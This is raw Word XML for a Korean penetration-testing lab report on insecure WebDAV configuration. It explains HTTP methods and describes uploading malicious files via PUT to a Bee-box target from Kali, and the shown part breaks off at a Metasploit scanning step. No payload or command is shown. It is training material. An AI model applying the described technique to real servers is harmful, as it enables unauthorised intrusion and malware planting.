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D294FF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925C0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  <w:bookmarkStart w:id="0" w:name="_Hlk61549532"/>
            <w:bookmarkEnd w:id="0"/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A40D7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466F52" w14:textId="77777777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모의해킹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2AE3A885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D92E4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91ED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916BD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91C682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4C8BC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5CD0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A6912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6C409C9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577DD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43A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1B38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6BFBF15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4FE7E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3D7F3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607D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0B34ED3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27AAC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8DDA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5BCF8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FC5F7B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D574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9579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F31DAA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5423C4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BD3C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7525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AFC5BF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9E57193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F4E6E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4B40953F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A7013" w14:textId="77777777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E10849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  <w:r w:rsidR="00E10849">
              <w:rPr>
                <w:rFonts w:ascii="DX인생극장B" w:eastAsia="DX인생극장B" w:hAnsi="DX인생극장B" w:hint="eastAsia"/>
                <w:sz w:val="36"/>
                <w:szCs w:val="36"/>
              </w:rPr>
              <w:t>신세은</w:t>
            </w:r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A48BE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7554365D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242D1FE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87EE2F4" w14:textId="77777777" w:rsidR="00435F8A" w:rsidRPr="001F0BA1" w:rsidRDefault="0034556D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S</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="DX인생극장B" w:eastAsia="DX인생극장B" w:hAnsi="DX인생극장B"/>
                <w:sz w:val="56"/>
                <w:szCs w:val="56"/>
              </w:rPr>
              <w:t>ecurity Misconfigu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570C5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056FEC94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69747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664A0" w14:textId="450F1F04" w:rsidR="00810D7F" w:rsidRPr="00810D7F" w:rsidRDefault="00810D7F" w:rsidP="00435F8A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EFBD6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33AF666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3A736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C27F7E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1DA29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28C7005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BA2A6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B98A4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CB995C" w14:textId="77777777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33CB78FF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5D47C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59E0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DCF5B9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5DC9CA5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DB0B8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153C3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541766A3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0C94C5D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5835AC2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7B3DAF8C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847D5B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2163A9D2" w14:textId="77777777" w:rsidR="00DE047E" w:rsidRDefault="00DE047E"/>
    <w:p w14:paraId="0776A4B3" w14:textId="77777777" w:rsidR="00DE047E" w:rsidRDefault="00DE047E"/>
    <w:p w14:paraId="6D991E79" w14:textId="77777777" w:rsidR="00DE047E" w:rsidRDefault="00DE047E"/>
    <w:p w14:paraId="2632F1AF" w14:textId="77777777" w:rsidR="00DE047E" w:rsidRDefault="00DE047E"/>
    <w:p w14:paraId="0B6E8571" w14:textId="77777777" w:rsidR="006F2E6D" w:rsidRDefault="006F2E6D"/>
    <w:p w14:paraId="2A0202BD" w14:textId="77777777" w:rsidR="006F2E6D" w:rsidRDefault="006F2E6D"/>
    <w:p w14:paraId="2A2FD977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58410E66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08B664AE" w14:textId="473AB749" w:rsidR="001F0BA1" w:rsidRPr="00AE7893" w:rsidRDefault="00AE7893" w:rsidP="00AE7893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W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ebDAV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개요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 </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="001F0BA1" w14:paraId="65DA9AFE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52D238D1" w14:textId="77777777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4E2DEFDF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0E78DFCA" w14:textId="77777777" w:rsidR="00663B5B" w:rsidRPr="00663B5B" w:rsidRDefault="00663B5B" w:rsidP="00663B5B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663B5B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안전하지 않은 </w:t>
            </w:r>
            <w:r w:rsidRPr="00663B5B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WebDAV </w:t>
            </w:r>
            <w:r w:rsidRPr="00663B5B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설정</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BE7966" w14:paraId="74028A19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6F250DC5" w14:textId="77777777" w:rsidR="00BE7966" w:rsidRDefault="00663B5B" w:rsidP="00194478">
            <w:pPr>
              <w:pStyle w:val="a4"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="25"/>
              </w:numPr>
              <w:spacing w:line="360" w:lineRule="auto"/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w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ebDAV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는 원격적으로 웹 서버를 제어할 수 있는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HTTP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토콜의 확장 기능이다.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0A9DEFAF" w14:textId="77777777" w:rsidR="00663B5B" w:rsidRDefault="00663B5B" w:rsidP="00194478">
            <w:pPr>
              <w:pStyle w:val="a4"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="25"/>
              </w:numPr>
              <w:spacing w:line="360" w:lineRule="auto"/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w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ebDAV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가 보안 설정이 되어있지 않으면 공격자는 이 확장 기능을 이용하여 악성 스크립트가 포함된 파일을 업로드해서 시스템에 침투할 수 있다.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="53580D49" w14:textId="77777777" w:rsidR="00663B5B" w:rsidRPr="00663B5B" w:rsidRDefault="00663B5B" w:rsidP="00194478">
            <w:pPr>
              <w:pStyle w:val="a4"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="25"/>
              </w:numPr>
              <w:spacing w:line="360" w:lineRule="auto"/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파일을 수저하여 악의적인 행위를 할 수 있으며,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공격 가능 조건은 서버에서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webDAV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를 사용중이면서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PUT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메소드를 사용하는 경우이다.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BE7966" w14:paraId="592DD644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078E675" w14:textId="77777777" w:rsidR="00BE7966" w:rsidRPr="00663B5B" w:rsidRDefault="00663B5B" w:rsidP="00663B5B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663B5B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W</w:t>
            </w:r>
            <w:r w:rsidRPr="00663B5B">
              <w:rPr>
                <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>ebDAV</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BE7966" w14:paraId="67474804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CBA228" w14:textId="77777777" w:rsidR="00BE7966" w:rsidRPr="00194478" w:rsidRDefault="00BE7966" w:rsidP="00025C1B">
            <w:pPr>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19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3"/>
              <w:gridCol w:w="8307"/>
            </w:tblGrid>
            <w:tr w:rsidR="00663B5B" w:rsidRPr="00194478" w14:paraId="13A788E8" w14:textId="77777777" w:rsidTr="00194478">
              <w:tc>
                <w:tcPr>
                  <w:tcW w:w="2153" w:type="dxa"/>
                  <w:shd w:val="clear" w:color="auto" w:fill="E2EFD9" w:themeFill="accent6" w:themeFillTint="33"/>
                </w:tcPr>
                <w:p w14:paraId="618C92DB" w14:textId="60C875C6" w:rsidR="00663B5B" w:rsidRPr="00194478" w:rsidRDefault="00663B5B" w:rsidP="00194478">
                  <w:pPr>
                    <w:jc w:val="center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19447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메소드</w:t>
                  </w:r>
                </w:p>
              </w:tc>
              <w:tc>
                <w:tcPr>
                  <w:tcW w:w="8307" w:type="dxa"/>
                  <w:shd w:val="clear" w:color="auto" w:fill="E2EFD9" w:themeFill="accent6" w:themeFillTint="33"/>
                </w:tcPr>
                <w:p w14:paraId="68EAD2D8" w14:textId="06F19DF6" w:rsidR="00663B5B" w:rsidRPr="00194478" w:rsidRDefault="00663B5B" w:rsidP="00194478">
                  <w:pPr>
                    <w:jc w:val="center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19447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내용</w:t>
                  </w:r>
                </w:p>
              </w:tc>
            </w:tr>
            <w:tr w:rsidR="00663B5B" w:rsidRPr="00194478" w14:paraId="539910FC" w14:textId="77777777" w:rsidTr="00663B5B">
              <w:tc>
                <w:tcPr>
                  <w:tcW w:w="2153" w:type="dxa"/>
                </w:tcPr>
                <w:p w14:paraId="1D3BD6FE" w14:textId="0DD84893" w:rsidR="00663B5B" w:rsidRPr="00194478" w:rsidRDefault="00663B5B" w:rsidP="00194478">
                  <w:pPr>
                    <w:jc w:val="center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19447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G</w:t>
                  </w:r>
                  <w:r w:rsidRPr="00194478"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>ET</w:t>
                  </w:r>
                </w:p>
              </w:tc>
              <w:tc>
                <w:tcPr>
                  <w:tcW w:w="8307" w:type="dxa"/>
                </w:tcPr>
                <w:p w14:paraId="1BB39648" w14:textId="2804F23B" w:rsidR="00663B5B" w:rsidRPr="00194478" w:rsidRDefault="00194478" w:rsidP="00025C1B">
                  <w:pPr>
                    <w:jc w:val="left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리소드를 취득할 때 사용한다.</w:t>
                  </w:r>
                  <w:r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 xml:space="preserve"> URL </w:t>
                  </w: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형식으로 웹 서버에 리소스를 요청한다.</w:t>
                  </w:r>
                </w:p>
              </w:tc>
            </w:tr>
            <w:tr w:rsidR="00663B5B" w:rsidRPr="00194478" w14:paraId="273BFF8E" w14:textId="77777777" w:rsidTr="00663B5B">
              <w:tc>
                <w:tcPr>
                  <w:tcW w:w="2153" w:type="dxa"/>
                </w:tcPr>
                <w:p w14:paraId="322D82AB" w14:textId="59296078" w:rsidR="00663B5B" w:rsidRPr="00194478" w:rsidRDefault="00663B5B" w:rsidP="00194478">
                  <w:pPr>
                    <w:jc w:val="center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19447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H</w:t>
                  </w:r>
                  <w:r w:rsidRPr="00194478"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>EAD</w:t>
                  </w:r>
                </w:p>
              </w:tc>
              <w:tc>
                <w:tcPr>
                  <w:tcW w:w="8307" w:type="dxa"/>
                </w:tcPr>
                <w:p w14:paraId="16FA9BE9" w14:textId="5E89A6C8" w:rsidR="00663B5B" w:rsidRPr="00194478" w:rsidRDefault="00194478" w:rsidP="00025C1B">
                  <w:pPr>
                    <w:jc w:val="left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메세지 헤더 정보만 취득할 때 사용한다.</w:t>
                  </w:r>
                </w:p>
              </w:tc>
            </w:tr>
            <w:tr w:rsidR="00663B5B" w:rsidRPr="00194478" w14:paraId="7B7B2715" w14:textId="77777777" w:rsidTr="00663B5B">
              <w:tc>
                <w:tcPr>
                  <w:tcW w:w="2153" w:type="dxa"/>
                </w:tcPr>
                <w:p w14:paraId="43C7B01F" w14:textId="204DE006" w:rsidR="00663B5B" w:rsidRPr="00194478" w:rsidRDefault="00663B5B" w:rsidP="00194478">
                  <w:pPr>
                    <w:jc w:val="center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19447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P</w:t>
                  </w:r>
                  <w:r w:rsidRPr="00194478"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>OST</w:t>
                  </w:r>
                </w:p>
              </w:tc>
              <w:tc>
                <w:tcPr>
                  <w:tcW w:w="8307" w:type="dxa"/>
                </w:tcPr>
                <w:p w14:paraId="5EBC5E51" w14:textId="24E86511" w:rsidR="00663B5B" w:rsidRPr="00194478" w:rsidRDefault="00194478" w:rsidP="00025C1B">
                  <w:pPr>
                    <w:jc w:val="left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 xml:space="preserve">내용을 </w:t>
                  </w:r>
                  <w:r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 xml:space="preserve">URL </w:t>
                  </w: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 xml:space="preserve">형식으로 전송하는 것이 아니라 </w:t>
                  </w:r>
                  <w:r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 xml:space="preserve">Body </w:t>
                  </w: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에 내용을 포함시켜 전송한다.</w:t>
                  </w:r>
                </w:p>
              </w:tc>
            </w:tr>
            <w:tr w:rsidR="00663B5B" w:rsidRPr="00194478" w14:paraId="5C64E623" w14:textId="77777777" w:rsidTr="00663B5B">
              <w:tc>
                <w:tcPr>
                  <w:tcW w:w="2153" w:type="dxa"/>
                </w:tcPr>
                <w:p w14:paraId="3E9752C8" w14:textId="70193BBB" w:rsidR="00663B5B" w:rsidRPr="00194478" w:rsidRDefault="00663B5B" w:rsidP="00194478">
                  <w:pPr>
                    <w:jc w:val="center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19447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P</w:t>
                  </w:r>
                  <w:r w:rsidRPr="00194478"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>UT</w:t>
                  </w:r>
                </w:p>
              </w:tc>
              <w:tc>
                <w:tcPr>
                  <w:tcW w:w="8307" w:type="dxa"/>
                </w:tcPr>
                <w:p w14:paraId="4E4F89C3" w14:textId="1D8ECDDF" w:rsidR="00663B5B" w:rsidRPr="00194478" w:rsidRDefault="00194478" w:rsidP="00025C1B">
                  <w:pPr>
                    <w:jc w:val="left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헤더 이외에 메세지(파일)을 전송할 수 있다.</w:t>
                  </w:r>
                  <w:r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즉,</w:t>
                  </w:r>
                  <w:r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웹 서버에 파일을 전송할 수 있다.</w:t>
                  </w:r>
                </w:p>
              </w:tc>
            </w:tr>
            <w:tr w:rsidR="00663B5B" w:rsidRPr="00194478" w14:paraId="2F0EE70F" w14:textId="77777777" w:rsidTr="00663B5B">
              <w:tc>
                <w:tcPr>
                  <w:tcW w:w="2153" w:type="dxa"/>
                </w:tcPr>
                <w:p w14:paraId="33C5C7E8" w14:textId="5D6ADC58" w:rsidR="00663B5B" w:rsidRPr="00194478" w:rsidRDefault="00194478" w:rsidP="00194478">
                  <w:pPr>
                    <w:jc w:val="center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19447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D</w:t>
                  </w:r>
                  <w:r w:rsidRPr="00194478"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>ELETE</w:t>
                  </w:r>
                </w:p>
              </w:tc>
              <w:tc>
                <w:tcPr>
                  <w:tcW w:w="8307" w:type="dxa"/>
                </w:tcPr>
                <w:p w14:paraId="4592E2AD" w14:textId="37C38278" w:rsidR="00194478" w:rsidRPr="00194478" w:rsidRDefault="00194478" w:rsidP="00025C1B">
                  <w:pPr>
                    <w:jc w:val="left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파일 삭제 및 웹 리소스를 삭제한다.</w:t>
                  </w:r>
                </w:p>
              </w:tc>
            </w:tr>
            <w:tr w:rsidR="00194478" w:rsidRPr="00194478" w14:paraId="3BA4167A" w14:textId="77777777" w:rsidTr="00663B5B">
              <w:tc>
                <w:tcPr>
                  <w:tcW w:w="2153" w:type="dxa"/>
                </w:tcPr>
                <w:p w14:paraId="535CBCE8" w14:textId="3D64D83D" w:rsidR="00194478" w:rsidRPr="00194478" w:rsidRDefault="00194478" w:rsidP="00194478">
                  <w:pPr>
                    <w:jc w:val="center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19447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O</w:t>
                  </w:r>
                  <w:r w:rsidRPr="00194478"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>PTIONS</w:t>
                  </w:r>
                </w:p>
              </w:tc>
              <w:tc>
                <w:tcPr>
                  <w:tcW w:w="8307" w:type="dxa"/>
                </w:tcPr>
                <w:p w14:paraId="27C7EB8C" w14:textId="05BEF164" w:rsidR="00194478" w:rsidRPr="00194478" w:rsidRDefault="00194478" w:rsidP="00025C1B">
                  <w:pPr>
                    <w:jc w:val="left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서버가 지원한느 메소드를 질의하여 응답으로 받아온다.</w:t>
                  </w:r>
                </w:p>
              </w:tc>
            </w:tr>
          </w:tbl>
          <w:p w14:paraId="779402C9" w14:textId="77777777" w:rsidR="00663B5B" w:rsidRDefault="00663B5B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E81DEA5" w14:textId="77777777" w:rsidR="00663B5B" w:rsidRPr="00BE7966" w:rsidRDefault="00663B5B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tbl>
      <w:tblPr>
        <w:tblStyle w:val="1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94478" w:rsidRPr="00663B5B" w14:paraId="5DC41527" w14:textId="77777777" w:rsidTr="00A8495D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B0AF0C9" w14:textId="0CDCA968" w:rsidR="00194478" w:rsidRPr="00663B5B" w:rsidRDefault="00194478" w:rsidP="00194478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>Insecure WebDAV Configuration</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="113F61D4" w14:textId="77777777" w:rsidR="00194478" w:rsidRPr="00194478" w:rsidRDefault="00194478" w:rsidP="00194478">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="27"/>
        </w:numPr>
        <w:ind w:leftChars="0"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00194478">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">‘PUT’ </w:t>
      </w:r>
      <w:r w:rsidRPr="00194478">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">메소드를 이용하여 </w:t>
      </w:r>
      <w:r w:rsidRPr="00194478">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>WebDAV</w:t>
      </w:r>
      <w:r w:rsidRPr="00194478">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>에 악의적인 파일을 업로드하는 취약적을 가지고 있다.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34A2A6C2" w14:textId="77777777" w:rsidR="006F2E6D" w:rsidRDefault="00194478" w:rsidP="00194478">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="27"/>
        </w:numPr>
        <w:ind w:leftChars="0"/>
      </w:pPr>
      <w:r w:rsidRPr="00194478">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>업로드된 파일(악성코드.</w:t>
      </w:r>
      <w:r w:rsidRPr="00194478">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00194478">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>백도어,</w:t>
      </w:r>
      <w:r w:rsidRPr="00194478">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00194478">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>랜섬웨어 등)을 다른 사용자가 클릭하게 되면 문제가 발생할 수 있다.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="006F2E6D"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72312307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5EE42A21" w14:textId="7777777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8507E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1290FB76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6219CB16" w14:textId="1CB8359C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FA66E1">
              <w:rPr>
                <w:rFonts w:ascii="DX국민시대" w:eastAsia="DX국민시대" w:hAnsi="DX국민시대" w:hint="eastAsia"/>
                <w:sz w:val="40"/>
                <w:szCs w:val="40"/>
              </w:rPr>
              <w:t>,</w:t>
            </w:r>
            <w:r w:rsidR="00FA66E1">
              <w:rPr>
                <w:rFonts w:ascii="DX국민시대" w:eastAsia="DX국민시대" w:hAnsi="DX국민시대"/>
                <w:sz w:val="40"/>
                <w:szCs w:val="40"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidR="00FA66E1">
              <w:rPr>
                <w:rFonts w:ascii="DX국민시대" w:eastAsia="DX국민시대" w:hAnsi="DX국민시대" w:hint="eastAsia"/>
                <w:sz w:val="40"/>
                <w:szCs w:val="40"/>
              </w:rPr>
              <w:t>공격결과</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BE7966" w14:paraId="5D856417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5F0BA9FE" w14:textId="77777777" w:rsidR="00B67587" w:rsidRPr="00BE7966" w:rsidRDefault="005351E1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43274B15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9EEAF" id="직사각형 7" o:spid="_x0000_s1026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638EE507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615DB8FE" w14:textId="77777777" w:rsidR="0050741D" w:rsidRPr="00B67587" w:rsidRDefault="0034556D" w:rsidP="0034556D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4000D">
              <w:rPr>
                <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding" w:hint="eastAsia"/>
                <w:b/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>실습환경</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0050741D" w14:paraId="2717E22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7BF527F0" w14:textId="77777777" w:rsidR="003D753D" w:rsidRDefault="003D753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483"/>
              <w:gridCol w:w="3483"/>
              <w:gridCol w:w="3484"/>
            </w:tblGrid>
            <w:tr w:rsidR="0034556D" w14:paraId="64352A24" w14:textId="77777777" w:rsidTr="00FA66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5" w:type="dxa"/>
                  <w:tcBorders>
                    <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
                  </w:tcBorders>
                  <w:vAlign w:val="center"/>
                </w:tcPr>
                <w:p w14:paraId="070A1FB2" w14:textId="77777777" w:rsidR="0034556D" w:rsidRDefault="0034556D" w:rsidP="0034556D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</w:tc>
              <w:tc>
                <w:tcPr>
                  <w:tcW w:w="3485" w:type="dxa"/>
                  <w:tcBorders>
                    <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
                  </w:tcBorders>
                  <w:vAlign w:val="center"/>
                </w:tcPr>
                <w:p w14:paraId="2A6EACBB" w14:textId="77777777" w:rsidR="0034556D" w:rsidRDefault="0034556D" w:rsidP="0034556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OS</w:t>
                  </w:r>
                </w:p>
              </w:tc>
              <w:tc>
                <w:tcPr>
                  <w:tcW w:w="3485" w:type="dxa"/>
                  <w:tcBorders>
                    <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
                  </w:tcBorders>
                  <w:vAlign w:val="center"/>
                </w:tcPr>
                <w:p w14:paraId="72E55D32" w14:textId="77777777" w:rsidR="0034556D" w:rsidRDefault="0034556D" w:rsidP="0034556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IP</w:t>
                  </w:r>
                </w:p>
              </w:tc>
            </w:tr>
            <w:tr w:rsidR="0034556D" w14:paraId="348E9ACF" w14:textId="77777777" w:rsidTr="00FA66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EA555" w14:textId="77777777" w:rsidR="0034556D" w:rsidRDefault="0034556D" w:rsidP="0034556D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공격 호스트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98A30" w14:textId="77777777" w:rsidR="0034556D" w:rsidRDefault="0034556D" w:rsidP="0034556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Kali Linux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74B40" w14:textId="77777777" w:rsidR="0034556D" w:rsidRDefault="0034556D" w:rsidP="0034556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192.168.0.150/24</w:t>
                  </w:r>
                </w:p>
              </w:tc>
            </w:tr>
            <w:tr w:rsidR="0034556D" w14:paraId="4D9C65AE" w14:textId="77777777" w:rsidTr="00FA66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5D8C1" w14:textId="77777777" w:rsidR="0034556D" w:rsidRDefault="0034556D" w:rsidP="0034556D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타겟 호스</w:t>
                  </w:r>
                  <w:r w:rsidR="00FA66E1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트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950FB" w14:textId="77777777" w:rsidR="0034556D" w:rsidRDefault="0034556D" w:rsidP="0034556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Ubuntu(Bee-box)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4AA76" w14:textId="77777777" w:rsidR="0034556D" w:rsidRDefault="0034556D" w:rsidP="0034556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192.168.0.146/24</w:t>
                  </w:r>
                </w:p>
              </w:tc>
            </w:tr>
          </w:tbl>
          <w:p w14:paraId="03F5A4DF" w14:textId="77777777" w:rsidR="0034556D" w:rsidRDefault="0034556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01C2BEA1" w14:textId="77777777" w:rsidR="0034556D" w:rsidRPr="00BE7966" w:rsidRDefault="0034556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50741D" w14:paraId="09BE37E5" w14:textId="77777777" w:rsidTr="005351E1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5A4AFC4F" w14:textId="77777777" w:rsidR="0050741D" w:rsidRPr="0034556D" w:rsidRDefault="0025501D" w:rsidP="0034556D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>Insecure WebDAV Configuration</w:t>
            </w:r>
            <w:r w:rsidR="00FA66E1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 공격 </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="617313D2" w14:textId="77777777" w:rsidR="0025501D" w:rsidRPr="0025501D" w:rsidRDefault="0025501D" w:rsidP="00EF1860">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="16CC5202" w14:textId="77777777" w:rsidR="0034556D" w:rsidRPr="00A61C03" w:rsidRDefault="0034556D" w:rsidP="0034556D">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="12"/>
        </w:numPr>
        <w:ind w:leftChars="0"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A61C03">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t>보안 레벨 선택 및 시나리오 선택</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3772CDBA" w14:textId="77777777" w:rsidR="0034556D" w:rsidRPr="002847F0" w:rsidRDefault="00D3530D" w:rsidP="0034556D">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:ind w:leftChars="0"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="1" w:name="_Hlk61290442"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t>I</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">nsecure WebDAV Configuration </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A4B187C" w14:textId="77777777" w:rsidR="0034556D" w:rsidRDefault="0034556D" w:rsidP="0034556D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b/>
        </w:rPr>
        <w:t xml:space="preserve">low </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">선택 후, set 클릭 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DF72490" w14:textId="77777777" w:rsidR="00D3530D" w:rsidRDefault="008112DB" w:rsidP="007C6147">
      <w:pPr>
        <w:ind w:firstLine="8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BB0E2" wp14:editId="289F3312">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>1522672</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>343942</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="1598295" cy="146050"/>
                <wp:effectExtent l="19050" t="19050" r="20955" b="25400"/>
                <wp:wrapNone/>
                <wp:docPr id="65" name="직사각형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E0226" id="직사각형 65" o:spid="_x0000_s1026" style="position:absolute;left:0;text-align:left;margin-left:119.9pt;margin-top:27.1pt;width:125.85pt;height:11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" filled="f" strokecolor="#c00000" strokeweight="2.25pt"/>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="0019447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F05F49" wp14:editId="2FA2F97B">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>4140200</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>932815</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="1598295" cy="322580"/>
                <wp:effectExtent l="19050" t="19050" r="20955" b="2032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3225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9B652" id="직사각형 42" o:spid="_x0000_s1026" style="position:absolute;left:0;text-align:left;margin-left:326pt;margin-top:73.45pt;width:125.85pt;height:25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" filled="f" strokecolor="#c00000" strokeweight="2.25pt"/>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="0019447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2FEDD5" wp14:editId="56948D85">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>4135120</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>713735</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="1598295" cy="146050"/>
                <wp:effectExtent l="19050" t="19050" r="20955" b="2540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7CC5B" id="직사각형 41" o:spid="_x0000_s1026" style="position:absolute;left:0;text-align:left;margin-left:325.6pt;margin-top:56.2pt;width:125.85pt;height:1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" filled="f" strokecolor="#c00000" strokeweight="2.25pt"/>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="00695C89" w:rsidRPr="00695C89">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3F8B4363" wp14:editId="1F254E7C">
            <wp:extent cx="5760000" cy="1412676"/>
            <wp:effectExtent l="19050" t="19050" r="12700" b="165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12676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428825" w14:textId="77777777" w:rsidR="007C6147" w:rsidRDefault="007C6147" w:rsidP="007C6147">
      <w:pPr>
        <w:ind w:firstLine="800"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0C6DD97F" w14:textId="77777777" w:rsidR="007C6147" w:rsidRDefault="007C6147" w:rsidP="007C6147">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="12"/>
        </w:numPr>
        <w:ind w:leftChars="0"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t>M</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>etasploi</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t>t을 이용하여 스캐닝 실시</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D3D9FBF" w14:textId="77777777" w:rsidR="007C6147" w:rsidRPr="007C6147" w:rsidRDefault="007C6147" w:rsidP="007C6147">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="12"/>
        </w:numPr>
        <w:ind w:leftChars="0"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">공격자는 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>webdav</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t>가 활성화 되어있는것을 알지 못하므로,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="007C6147">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t>m</w:t>
